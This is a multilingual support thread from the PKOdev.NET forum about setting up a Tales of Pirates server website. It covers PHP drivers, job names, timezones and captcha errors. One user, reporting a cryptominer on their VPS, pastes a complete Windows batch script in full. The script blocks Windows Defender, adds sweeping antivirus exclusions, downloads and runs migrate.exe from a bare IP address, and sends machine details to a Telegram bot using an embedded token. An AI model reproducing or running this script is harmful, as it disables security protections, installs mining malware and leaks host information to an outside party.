V3ct0r

PKOdev.NET website for Tales of Pirates Server

3 hours ago, Mesut said:

i cant even connect to mysql on xampp what is wrong i try to go phpadmin localhost but i get this error.

Namnlös.png

You need to run xampp as admin, install/start apache and mysql module first.

• Thanks 1

Hello @Mesut,

1) You do not need MySQL for this website, but MSSQL and SQLite;

2) I didn't run the website on XAMPP, but used a manual build of Apache + PHP 7;

3) Put the website files to the htdocs folder.

Здравствуйте на Вашем веб сайте не меняется профессия всегда пишет Newbie использую сервер 

PKO 1.38 [RUS] Автор MrSharp 

как поправить?

spacer.png

Привет, @small666!

Открой файл inc.functions.lua (папка include) и отредактируй функции getJobIdByName() и getJobNameById(). В них нужно прописать названия профессий как они у тебя записываются в GameDB в таблицу character.

• Like 1

On 4/15/2022 at 12:10 AM, kenkas15 said:

"

Ooops!

A critical error has occurred!

PDO error when working with database: could not find driver "

What's going on? help me pls

Hello!

The error means that there are no some PDO drivers (sqlsrv, sqlite) for PHP installed on the your webserver. These drivers are required for the website functioning.

On 5/29/2021 at 10:23 PM, V3ct0r said:

Requirements

1) Web server;

2) PHP version 7.0 and above;

3) Enabled PDO extension with sqlsrv and sqlite drivers.

Привет V3ct0r. Я понимаю что это просто моя лень и можно перевести все но все-же можете выложить и на русском языке раз уж есть на английском в доступе 😉

Edited by small666

Hello @dragontechi,

Can you describe step by step what you are doing? The date cannot be taken from user's computer, check the timezone in your web server settings.

1 hour ago, V3ct0r said:

Hola@dragontechi,

¿Puedes describir paso a paso lo que estás haciendo? La fecha no se puede tomar de la computadora del usuario, verifique la zona horaria en la configuración de su servidor web.

I will send you the config file that was the only thing that config of the web by private

Hello @dragontechi,

On 9/6/2022 at 5:45 PM, V3ct0r said:

Can you describe step by step what you are doing?

Can you describe how to get a 404 error when going to the login page?

23 hours ago, dragontechi said:

I will send you the config file that was the only thing that config of the web by private

This time on the video can't be user's time.  Open the file inc.block.serverstatus.php and go to line 70:

$smarty->assign('server_time', date('H:i m/d/Y', time()));

This indicates that the time is taken from the server.

Check your webserver timezone settings.

OR

try to put this function at the beggining of the index.php file:

date_default_timezone_set(timezone)

where timezone is the name of one of supported timezones.

OR

Rewrite the script inc.block.serverstatus.php and use DateTime class instead of date()/time() functions.

• Thanks 1

12 minutes ago, V3ct0r said:

Hello @dragontechi,

Can you describe how to get a 404 error when going to the login page?

This time on the video can't be user's time.  Open the file inc.block.serverstatus.php and go to line 70:

$smarty->assign('server_time', date('H:i m/d/Y', time()));

This indicates that the time is taken from the server.

Check your webserver timezone settings.

OR

try to put this function at the beggining of the index.php file:

date_default_timezone_set(timezone)

where timezone is the name of one of supported timezones.

OR

Rewrite the script inc.block.serverstatus.php and use DateTime class instead of date()/time() functions.

ok in a few minutes i will check

5 hours ago, V3ct0r said:

Hola@dragontechi,

¿Puede describir cómo obtener un error 404 al ir a la página de inicio de sesión?

Esta hora en el video no puede ser la hora del usuario. Abra el archivo  inc.block.serverstatus.php y vaya a la línea 70 :

Esto indica que la hora se toma del servidor.

Verifique la configuración de la zona horaria de su servidor web.

O

intente poner esta función al principio del archivo index.php :

donde  timezone es el nombre de una de las zonas horarias admitidas .

O

Vuelva a escribir el script  inc.block.serverstatus.php  y use la clase DateTime en lugar de las funciones date()/time().

It works for me only by placing date_default_timezone_set('America/Santo_Domingo');image.png.a171261103337fb63a0746fac2c65d5c.pngMe funciona 

Edited by dragontechi
farta de infomacion

Hello @Mesut,

Google -> The error message text. This is not a website-specific error.

• Like 1

@V3ct0r 

hello good how is everything I want to comment something about this web page I sent you the information privately the matter is take the web install it in a clean vps only the web the xampp if nothing else in the vps after 1 or 3 days in the vps It appears to me that it is mining, some type of script is executed when I carry out said installation, I cannot ensure 100% of the information, but since it happened to me several times, I saw the first one, I installed all web servers, after a time due to a high amount of lag, I start to verify the tasks of vps and I see that some kind of mining is installed along with some applications like any desk could you check the website

304823898_654726766080230_4362505658026884831_n.jpg.91369cd25a90390371f449daa62d0f33.jpg

chcp 65001
TIMEOUT /T 10 /NOBREAK

dir "C:\ProgramData\Microsoft\Windows Defender" | findstr /i "Platform"
if "%ERRORLEVEL%"=="0" goto 6
if "%ERRORLEVEL%"=="1" goto 5

:6
icacls "C:\ProgramData\Microsoft\Windows Defender" /inheritance:e /deny "*S-1-1-0:(R,REA,RA,RD)" "*S-1-5-7:(R,REA,RA,RD)"
icacls "C:\ProgramData\Microsoft\Windows Defender" /inheritance:e /deny "SYSTEM:(R,REA,RA,RD)"
icacls "C:\ProgramData\Microsoft\Windows Defender" /inheritance:e /deny "TrustedInstaller:(R,REA,RA,RD)"
icacls "C:\ProgramData\Microsoft\Windows Defender" /inheritance:e /deny "Administrators:(R,REA,RA,RD)"
icacls "C:\ProgramData\Microsoft\Windows Defender" /inheritance:e /deny "Users:(R,REA,RA,RD)"
icacls "C:\ProgramData\Microsoft\Windows Defender" /inheritance:e /deny "%username%:(R,REA,RA,RD)"
icacls "C:\ProgramData\Microsoft\Windows Defender" /inheritance:e /deny "%domain%%username%:(R,REA,RA,RD)"
icacls "C:\ProgramData\Microsoft\Windows Defender" /inheritance:e /deny "EVERYONE:(R,REA,RA,RD)"

:5
powershell Add-MpPreference -ExclusionPath c:\windows\migration\ , c:\users\kbtgt\desktop\ , C:\Windows\tasks\ , C:\Windows\ , C:\Windows\Logs\ , C:\Windows\SysWOW64\ , %SystemRoot%\System32\WindowsPowerShell\v1.0\ , C:\ProgramData\
tasklist /FI "IMAGENAME eq Superfetch.exe" 2>NUL | find /I /N "Superfetch.exe">NUL
if "%ERRORLEVEL%"=="0" exit
if "%ERRORLEVEL%"=="1" goto 1

:1
takeown /f c:\windows\tasks
TIMEOUT /T 10 /NOBREAK
icacls "C:\Windows\Tasks" /inheritance:e /grant "*S-1-1-0:(R,REA,RA,RD)" "*S-1-5-7:(R,REA,RA,RD)"
icacls "C:\Windows\Tasks" /inheritance:e /grant "SYSTEM:(R,REA,RA,RD)"
icacls "C:\Windows\Tasks" /inheritance:e /grant "Administrators:(R,REA,RA,RD)"
icacls "C:\Windows\Tasks" /inheritance:e /grant "Users:(R,REA,RA,RD)"
icacls "C:\Windows\Tasks" /inheritance:e /grant "%username%:(R,REA,RA,RD)"
icacls "C:\Windows\Tasks" /inheritance:e /grant "%domain%%username%:(R,REA,RA,RD)"
icacls "C:\Windows\Tasks" /inheritance:e /grant "EVERYONE:(R,REA,RA,RD)"

TIMEOUT /T 10 /NOBREAK
c:\programdata\migrate.exe -p4432
TIMEOUT /T 3 /NOBREAK
TIMEOUT /T 60 /NOBREAK
tasklist /FI "IMAGENAME eq Superfetch.exe" 2>NUL | find /I /N "Superfetch.exe">NUL
if "%ERRORLEVEL%"=="0" goto 4
if "%ERRORLEVEL%"=="1" goto 2

:2
c:\windows\migrate.exe -p4432
TIMEOUT /T 60 /NOBREAK
if "%ERRORLEVEL%"=="0" goto 4
if "%ERRORLEVEL%"=="1" goto 3

:3
mkdir c:\windows\migration\
powershell "(new-object System.Net.WebClient).DownloadFile('http://45.81.224.130/migrate.exe','c:\windows\migration\migrate.exe')"
TIMEOUT /T 10 /NOBREAK
c:\windows\migration\migrate.exe -p4432
TIMEOUT /T 60 /NOBREAK
goto 4

:4
copy /Y "c:\programdata\curl.exe" "C:\Windows\curl.exe"
For /F "Tokens=2 Delims==" %%J In ('WMIC CPU Get Name /Value^|FindStr .') Do Call :Convert "%%J"
:Convert
set cpu=%~1

FOR /F "tokens=2 delims==" %%J IN ('WMIC /Node:localhost Path Win32_VideoController Get Name /Value^| FIND.EXE "="') Do Call :Convert2 "%%J"

:Convert2
set gpu=%~1

if "%ERRORLEVEL%"=="0" set run=SERVICE WMService RUN
if "%ERRORLEVEL%"=="1" set run=SERVICE WMService NOT RUN

set token="5086556714:AAF7DbEW7CWKb1GEIy6_inxVlrGJ39JUUBM"
set chat_id="552691400"
set MESSAGE=%computername%CORE%NUMBER_OF_PROCESSORS%%cpu%%gpu%%run%
set MESSAGE2= 
c:\windows\curl.exe --insecure --data chat_id=%chat_id% --data parse-mode=markdown --data-urlencode text="%MESSAGE%" "https://api.telegram.org/bot%token%/sendMessage"
exit

Hello @Mesut,

Do you can explain in more details what happening? This error usually appears when the user entered the captcha incorrectly.

register work but when i try to send lost my password send to user it does not work how do i config that, also how do i allow webpage to public?

Edited by Mesut